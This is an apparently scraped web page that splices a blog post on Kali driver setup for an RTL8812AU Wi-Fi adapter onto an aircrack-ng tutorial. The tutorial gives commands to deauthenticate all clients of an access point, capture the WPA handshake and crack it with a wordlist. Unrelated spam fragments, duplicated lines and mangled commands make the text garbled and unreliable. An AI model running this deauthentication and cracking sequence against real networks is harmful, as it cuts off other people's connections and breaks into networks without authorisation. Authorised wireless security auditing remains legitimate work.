I was looking at the Kali Linux 2017.1 Release notes and saw that they included drivers for the RTL8812AU chipset (802.11AC) that support packet injection. That really caught my interest so I immediately placed on order for yet another Alfa card the AWUS036ACH. I purchased it through Amazon where it was $54 with prime shipping the last week of April.
The adapter arrived and came with the antennas, USB cable, and a little clip mount that I've yet to try out. Overall, the quality is what I've come to expect from Alfa and I've had no issues with it.
- Nov 04, 2017 Joined Sep 1, 2014 Messages 3,430 Motherboard GA-H87N-WIFI CPU i7-4790S Graphics GT 740 Mac, Mobile Phone.
- Complete suite of tools to assess WiFi networks security. aircrack-ng. RTL8812AU/21AU and RTL8814AU driver with monitor mode and frame injection.
RTL8812AU/21AU and RTL8814AU driver with monitor mode and frame injection - kimocoder/rtl8812au.
Setup was fairly painless and I've included the basic steps below:
- Install the drivers in Kali
- apt-get update
- apt install realtek-rtl88xxau-dkms
2. *Set your USB compatibility to USB 3.0. I had to do this for VMware Fusion 8.5.6 for the adapter to function properly.
3. Once the device is showing up as an interface (iwconfig and in my case it was wlan0) you want to run airmon-ng check kill per the wireless driver troubleshooting guide which will check for processes that might interfere with the aircrack-ng suite and then kills them.
4. Put the device into monitor mode by running 'iwconfig wlan0 mode monitor'
5. Test out injection by running 'aireplay-ng wlan0 -9'
Now that I've verified that it works I need to setup an 802.11AC access point for further testing.
Aircrack-ng is a whole suite of tools for Wireless Security Auditing. It can be used to monitor, test, crack or attack Wireless Security Protocols like WEP, WPA, WPA2. Aircrack-ng is command line based and is available for Windows and Mac OS and other Unix based Operating systems. Aircrack-ng suite contains a lot of tools used for various purposes but here we’ll only look at some important tools that are used more often in Wireless Security testing.Airmon-ng
Airmon-ng is used to manage wireless card modes and to kill unnecessary processes while using aircrack-ng. To sniff a wireless connection, you need to change your wireless card from managed mode to monitor mode and airmon-ng is used for that purpose.
Rtl8812au Aircrack-ng
Airodump-ng
Airodump-ng is a wireless sniffer that can capture wireless data from one or more wireless Access Points. It is used to analyze nearby Access Points and to capture handshakes.
Aireplay-ng
Aireplay-ng is used for replay attacks and as packet injector. It can be de-authenticate users from their APs to capture handshakes.
Airdecap-ng
Aircrack Rtl8812au
Airdecap-ng is used to decrypt encrypted WEP, WPA/WPA2 wireless packets with known key.
Aircrack-ng
Aircrack-ng is used to attack WPA/WEP wireless protocols in order to find the key.
Aircrack-ng is easy to install in Ubuntu using APT. Just type the following command and this will install all tools available in Aircrack-ng suite.
sudoapt-get update
sudoapt-get install-y aircrack-ng
sudoapt-get install-y aircrack-ng
Usage
In this article, we’ll take a quick look at how to use aircrack-ng to crack an encrypted wireless network (TR1CKST3R in this example) to find the password.
First of all, list out all available wireless cards connected to your PC using ‘iwconfig’ command.
We’ll use ‘wlxc83a35cb4546’ named wireless card for this tutorial (This might be different in your case). Now, kill all the processes running on wireless card using airmon-ng.
This tool also allows you to cheat codes.PS2 Emulator WindowsIf you want to enjoy PS2 games on Windows, the use of these tools might be the right solution:.PCSX2 - a free program that can replicate the PS2 console. ![Ps2 emulator mac os x Ps2 emulator mac os x](https://img.ibxk.com.br/2012/8/programas/7091336912157.jpg?w=328&h=218&mode=crop&scale=both&quality=80)
![Ps2 emulator mac os x Ps2 emulator mac os x](https://img.ibxk.com.br/2012/8/programas/7091336912157.jpg?w=328&h=218&mode=crop&scale=both&quality=80)
ubuntu@ubuntu:~$ sudo airmon-ng check kill
Start Monitor mode on ‘wlxc83a35cb4546’ by typing
ubuntu@ubuntu:~$ sudo airmon-ng start wlxc83a35cb4546
Start Monitor mode on ‘wlxc83a35cb4546’ by typing
ubuntu@ubuntu:~$ sudo airmon-ng start wlxc83a35cb4546
Now, airmon-ng has started Monitor mode on wireless card, it’ll appear as different name ‘wlan0mon’. Run ‘iwconfig’ again to list wireless details.
Then, use airodump-ng to see nearby Wireless Access Points and their properties.
You can narrow down search using MAC (–bssid) and channel (-c) filters. To capture handshake (Handshake contains encrypted password), we need to save our packets somewhere using “–write” option. Type,
ubuntu@ubuntu:~$ sudo airodump-ng --bssid 6C:B7:49:FC:62:E4
-c11 wlan0mon --write/tmp/handshake.cap
--bssid : Access Point’s MAC Address
-c : Access Point’s channel [1-13]
--write : Stores captured packets at a defined location
-c11 wlan0mon --write/tmp/handshake.cap
--bssid : Access Point’s MAC Address
-c : Access Point’s channel [1-13]
--write : Stores captured packets at a defined location
Now, we need to de-authenticate every device from this Access Point using Aireplay-ng utility. Write Smil software.
ubuntu@ubuntu:~$ sudo aireplay-ng -0100-a[MAC_ADD] wlan0mon
-a : Specify Access Points MAC for Aireplay-ng
-0 : Specify number of deauth packets to send
After a while, all devices will be disconnected from that Access Point, when they’ll try to reconnect, running airodump-ng will capture the handshake. Mileage tracking form log template excel tracker sheet and. It’ll appear at the top of running airodump-ng.
Handshake is stored in ‘/tmp/’ directory, and contains encrypted password that can be brute forced offline using a dictionary. To crack the password, we’ll be using Aircrack-ng. Type
ubuntu@ubuntu:~$ sudo aircrack-ng /tmp/handshake.cap-01.cap -w
/usr/share/wordlists/rockyou.txt
-w : Specify the dictionary location
/usr/share/wordlists/rockyou.txt
-w : Specify the dictionary location
Aircrack-ng will go through the list of passwords, and if found, it’ll display the password used as key.
In this case, aircrack-ng found the password used ‘123456789’.
Now, stop Monitor mode on wireless card and restart the network-manager.
ubuntu@ubuntu:~$ sudo airmon-ng stop wlan0mon
ubuntu@ubuntu:~$ sudo service network-manager restart
ubuntu@ubuntu:~$ sudo service network-manager restart
Conclusion
Aircrack-ng can be used to audit Wireless Security or to crack forgotten passwords. There are some other similar tools available for this purpose like Kismet but aircrack-ng is better known for good support, versatility and having wide range of tools. It has easy to use Command line interface which can easily be automated using any scripting language like Python.